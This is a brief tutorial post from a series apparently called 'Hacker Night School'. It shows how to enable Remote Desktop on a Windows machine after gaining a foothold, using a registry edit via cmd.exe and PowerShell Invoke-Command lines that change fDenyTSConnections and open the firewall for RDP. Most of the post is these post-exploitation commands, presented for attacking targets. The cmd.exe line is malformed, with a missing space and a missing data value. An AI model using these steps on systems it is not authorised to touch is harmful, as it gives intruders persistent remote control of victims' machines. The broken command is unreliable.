[ Hacker Night School ] :: Got a foothold on a Windows target? Now enable Remote Desktop.

This entry is part 12 of 34 in the series [ Hacker Night School ]

Want to make your life easier once you’ve gotten a foothold on your Windows target? Enable Remote Desktop. See this article:



In cmd.exe:

Reg add\\computername\HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server  /v fDenyTSConnections /t REG_DWORD /d /f

In Powershell:

Invoke-Command –Computername “server1”, “Server2” –ScriptBlock {Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" –Value 0}
Don’t forget to allow RDP through the firewall:
Invoke-Command –Computername “server1”, “Server2” –ScriptBlock {Enable-NetFirewallRule -DisplayGroup "Remote Desktop"}
Now have fun!